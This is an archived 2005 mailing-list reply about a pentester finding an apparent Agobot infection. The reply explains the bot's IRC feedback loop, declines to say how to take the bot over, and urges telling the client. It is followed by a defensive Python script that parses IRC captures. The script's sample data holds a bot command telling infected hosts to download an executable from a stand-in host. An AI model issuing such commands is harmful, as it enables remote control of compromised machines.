From: Dave Dittrich (dittrich@u.washington.edu)
Date: Tue Sep 13 2005 - 19:19:00 EDT
> I'm pentesting a client's network and I have found a Windows NT4 machine
> with TCP ports 620 and 621 open.
>
> According to what I have found, this behaviour would mean the presence of
> the Agobot worm.
First, Agobot is not exactly a "worm", per se, although it can
be programmed to act like a worm. It is a bot, "blended threat",
or "remote control trojan on steroids," but not really a worm like
Sasser, Blaster, Slammer, etc.
> When I netcat this port, it returns garbage binary strings. When I connect
> to port 113 (auth), it replies with random USERIDs.
As a general rule, it isn't wise to poke around ports on a compromised
host without knowing exactly what is going on. The port that returns
you "garbage" characters is a file transfer, and that file transfer is
logged to the channel (allowing the attacker a feedback loop.)
(If you were capturing network traffic to/from that host, look for
your IP address in the IRC channel traffic and you'll see it. :)
> Does anyone know a way to exploit this worm to get access to the system?
Assuming you are correct that it is Agobot, there may be options, but
then you wouldn't know if the attacker has changed anything that would
make the bot harder to take over. Have you tried getting someone with
administrative access to look at the host? If you're doing a pen
test, and you discover that the client's network is already
compromised, hadn't you better inform them of this now?
--
Dave Dittrich
Information Assurance Researcher, The iSchool, University of Washington
dittrich@u.washington.edu
http://staff.washington.edu/dittrich
PGP key: http://staff.washington.edu/dittrich/pgpkey.txt
Fingerprint: FE97 0C57 0843 F3EB 49A1 0CD0 8E0C D0BE C838 CCB5
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:53 EDT
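The feedback loop Dave describes (the bot logging your probe to its IRC channel, where the operator can read it) is something you can check for in a capture of the host's traffic. Added example, not code from the post: Python that parses IRC PRIVMSG lines from captured traffic and returns the channel messages that mention the analyst's own address; the sample lines, nicknames, channel name and message wording are constructed, not real Agobot output.

```python
import re
from ipaddress import ip_address

# Constructed sample of IRC channel traffic, as the post describes a bot
# reporting a file transfer back to its channel. Addresses, nicks, channel and
# wording are invented; only the PRIVMSG line format is standard IRC.
SAMPLE_IRC = """\
:bot-a1b2!agobot@10.0.0.45 PRIVMSG #ctl :[FTP]: File transfer started to IP: 192.0.2.10 (C:\\WINNT\\system32\\svch0st.exe).
:bot-a1b2!agobot@10.0.0.45 PRIVMSG #ctl :[FTP]: File transfer complete to IP: 192.0.2.10 (C:\\WINNT\\system32\\svch0st.exe).
:bot-c3d4!agobot@10.0.0.46 PRIVMSG #ctl :[SCAN]: Scanning IP: 203.0.113.7.
:ops!ops@198.51.100.1 PRIVMSG #ctl :.update http://example.invalid/x.exe
"""

# ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r'^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<text>.*)$')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def parse_privmsgs(raw):
    """Yield (nick, target, text) for each PRIVMSG line in captured IRC text."""
    for line in raw.splitlines():
        m = PRIVMSG_RE.match(line.rstrip('\r'))
        if m:
            yield m.group('nick'), m.group('target'), m.group('text')

def feedback_for(raw, my_ip):
    """Channel messages in which a bot reported activity involving my_ip.

    This is the feedback loop from the post: the analyst's own probe shows up
    in the channel, so the operator learns who is looking at the host."""
    my_ip = str(ip_address(my_ip))  # validates and normalises the address
    return [(nick, target, text) for nick, target, text in parse_privmsgs(raw)
            if my_ip in IPV4_RE.findall(text)]

def reported_ips(raw):
    """Every IPv4 address mentioned in channel text, sorted numerically.

    Useful for scoping: which other hosts the bots reported touching."""
    ips = set()
    for _, _, text in parse_privmsgs(raw):
        ips.update(IPV4_RE.findall(text))
    return sorted(ips, key=ip_address)

if __name__ == '__main__':
    for nick, target, text in feedback_for(SAMPLE_IRC, '192.0.2.10'):
        print(f'{target} <{nick}> {text}')
```

To use it on a real capture, feed the function the reassembled IRC stream (for example the TCP payload of the bot's control connection) rather than the constructed sample.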